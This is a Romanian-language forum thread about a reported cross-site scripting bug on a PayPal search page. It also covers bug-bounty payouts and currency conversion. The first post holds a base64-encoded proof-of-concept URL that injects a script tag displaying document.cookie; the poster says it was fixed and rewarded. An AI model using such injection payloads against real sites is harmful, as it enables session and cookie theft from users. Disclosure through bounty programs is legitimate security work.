Jump to content
malsploit

[xss] paypal.com

Recommended Posts

aHR0cHM6Ly93d3cucGF5cGFsLmNvbS9pdC9jZ2ktYmluL3dlYnNjcj9jbWQ9X3Nob3Atc2VhcmNoLWV4dCZzZWFyY2hfY2F0X25hbWU9Ii8+JyZxPSImc2VhcmNoX2NhdD0mcmVnaW9uPTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuY29va2llKTwvc2NyaXB0Pg==

Aici era linkul vulnerabil. Cand l-au reparat au declansat alta vulnerabilitate, dar cred ca a fost ceva temporar.

Link to comment
Share on other sites

  • Active Members
Eu personal ii scot in lei.

De exemplu tu ai primit sa zicem 375 $ si ii scoti in LEI . Ei dupa ce curs valutar se iau ? Daca intelegi ce vreau sa zic

Poate .... nu stiu sigur ... dar daca in caz primesc ceva vreau sa fiu lamurit cum sta treaba :)

Am raportat 2 xss-uri !

// Nu ma las pana nu primesc macar odata bani de la ei

Edited by akkiliON
Link to comment
Share on other sites

De exemplu tu ai primit sa zicem 375 $ si ii scoti in LEI . Ei dupa ce curs valutar se iau ? Daca intelegi ce vreau sa zic :))

Din PayPal catre banca ta pleaca dolari .Daca contul tau in banca este in lei ,banca transforma dolarii in lei la cursul ei de schimb si iti alimenteaza contul cu lei .Daca contul tau este in dolari iti alimenteaza contul cu suma primita de la PayPal .

Link to comment
Share on other sites

ala l-ai gasit tu?

inca merge :|

EDIT:

Daca zici ca e gasit de tine, cum plm de mai merge ma?:)) vrei sa zici ca l-ai raportat si nu l-au rezolvat inca?

Xss-ul asta a a fost reparat inainte de a-l publica eu in thread-ul asta. Am si primit bounty-ul pentru el. Poate sa confirme cineva de la VIP. Tipul ala, a auzit de el sau l-a luat chiar de aici si l-a facut public spunand ca e functional.

Este reparat de vreo 3 saptamani.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...